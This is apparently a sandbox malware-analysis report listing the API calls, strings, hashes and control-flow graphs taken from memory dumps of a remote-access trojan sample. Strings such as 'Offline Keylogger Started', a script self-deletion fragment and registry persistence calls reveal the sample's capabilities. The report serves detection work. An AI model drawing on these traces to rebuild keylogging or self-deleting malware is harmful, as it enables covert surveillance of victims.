                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LongNamePath
                                                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                    • API String ID: 82841172-425784914
                                                                    • Opcode ID: 08e5b2704ffb3569a02c97d7245449eeb14453dae70a59a5a3dba01fefd1be5c
                                                                    • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                                                    • Opcode Fuzzy Hash: 08e5b2704ffb3569a02c97d7245449eeb14453dae70a59a5a3dba01fefd1be5c
                                                                    • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1791 41c3f1-41c402 1792 41c404-41c407 1791->1792 1793 41c41a-41c421 1791->1793 1794 41c410-41c418 1792->1794 1795 41c409-41c40e 1792->1795 1796 41c422-41c43b CreateFileW 1793->1796 1794->1796 1795->1796 1797 41c441-41c446 1796->1797 1798 41c43d-41c43f 1796->1798 1800 41c461-41c472 WriteFile 1797->1800 1801 41c448-41c456 SetFilePointer 1797->1801 1799 41c47f-41c484 1798->1799 1803 41c474 1800->1803 1804 41c476-41c47d FindCloseChangeNotification 1800->1804 1801->1800 1802 41c458-41c45f CloseHandle 1801->1802 1802->1798 1803->1804 1804->1799
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 0041C477
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
                                                                    • String ID: hpF
                                                                    • API String ID: 1087594267-151379673
                                                                    • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                    • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                                                    • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                    • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                                                    APIs
                                                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                      • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                      • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                      • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                      • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                    • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                    • API String ID: 782494840-2070987746
                                                                    • Opcode ID: d33b3aadf870e2a3d5ddb7e0db64bdc32883f42ff5325d09c6e3b3a72a78e76a
                                                                    • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                                                    • Opcode Fuzzy Hash: d33b3aadf870e2a3d5ddb7e0db64bdc32883f42ff5325d09c6e3b3a72a78e76a
                                                                    • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                    • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                      • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                      • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                      • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 2099061454-0
                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                    • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                    • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                      • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                      • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                      • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                      • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 2099061454-0
                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                    • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                    • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                    • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                    • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                    • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                    • String ID:
                                                                    • API String ID: 2152742572-0
                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                    • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                    • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CountEventTick
                                                                    • String ID: !D@$NG
                                                                    • API String ID: 180926312-2721294649
                                                                    • Opcode ID: d1dec2749ede0ea2c8b018d5d310ce0ed45e5f880b9985aee0b7f0f21380ab17
                                                                    • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                                                    • Opcode Fuzzy Hash: d1dec2749ede0ea2c8b018d5d310ce0ed45e5f880b9985aee0b7f0f21380ab17
                                                                    • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                                                    APIs
                                                                    • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                                                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$LocalTimewsprintf
                                                                    • String ID: Offline Keylogger Started
                                                                    • API String ID: 465354869-4114347211
                                                                    • Opcode ID: 5b1410a6f3612629f5c68e1dd6313c4815ae5c5874272d1b6117cd746c003483
                                                                    • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                                                    • Opcode Fuzzy Hash: 5b1410a6f3612629f5c68e1dd6313c4815ae5c5874272d1b6117cd746c003483
                                                                    • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                                                    APIs
                                                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                                    • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137A6
                                                                    • RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCreateValue
                                                                    • String ID: pth_unenc
                                                                    • API String ID: 1818849710-4028850238
                                                                    • Opcode ID: 944061157b2f8cf5ce0fe9502f04d7932ff2a7d7d8f180209318ac9fb18fc527
                                                                    • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                                                    • Opcode Fuzzy Hash: 944061157b2f8cf5ce0fe9502f04d7932ff2a7d7d8f180209318ac9fb18fc527
                                                                    • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                    • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                    • FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2579639479-0
                                                                    • Opcode ID: a856dfcc4fb5ec99c523120432dd4ff1f07683bf8a99cd0950dd96342101e422
                                                                    • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                                                    • Opcode Fuzzy Hash: a856dfcc4fb5ec99c523120432dd4ff1f07683bf8a99cd0950dd96342101e422
                                                                    • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 3919263394-0
                                                                    • Opcode ID: b5e3200c466b265101f42b470097a5df982af49012dad84e5cfda8818ecad7ff
                                                                    • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                                                    • Opcode Fuzzy Hash: b5e3200c466b265101f42b470097a5df982af49012dad84e5cfda8818ecad7ff
                                                                    • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                                                    APIs
                                                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                                                    • GetLastError.KERNEL32 ref: 0040D083
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateErrorLastMutex
                                                                    • String ID: SG
                                                                    • API String ID: 1925916568-3189917014
                                                                    • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                                                    • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                                                    • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                                                    • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                                                    APIs
                                                                    • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                    • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                    • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EventObjectSingleWaitsend
                                                                    • String ID:
                                                                    • API String ID: 3963590051-0
                                                                    • Opcode ID: a1ff3687248209f9743c60f565233b4765f32d228741c77e03e4de178fa39ade
                                                                    • Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
                                                                    • Opcode Fuzzy Hash: a1ff3687248209f9743c60f565233b4765f32d228741c77e03e4de178fa39ade
                                                                    • Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
                                                                    APIs
                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                    • RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID:
                                                                    • API String ID: 3677997916-0
                                                                    • Opcode ID: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                                                    • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                                                    • Opcode Fuzzy Hash: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                                                    • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                                                    APIs
                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                                                    • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID:
                                                                    • API String ID: 3677997916-0
                                                                    • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                    • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                                                    • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                    • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E1
                                                                    • _free.LIBCMT ref: 0044F41A
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F421
                                                                    Memory Dump Source
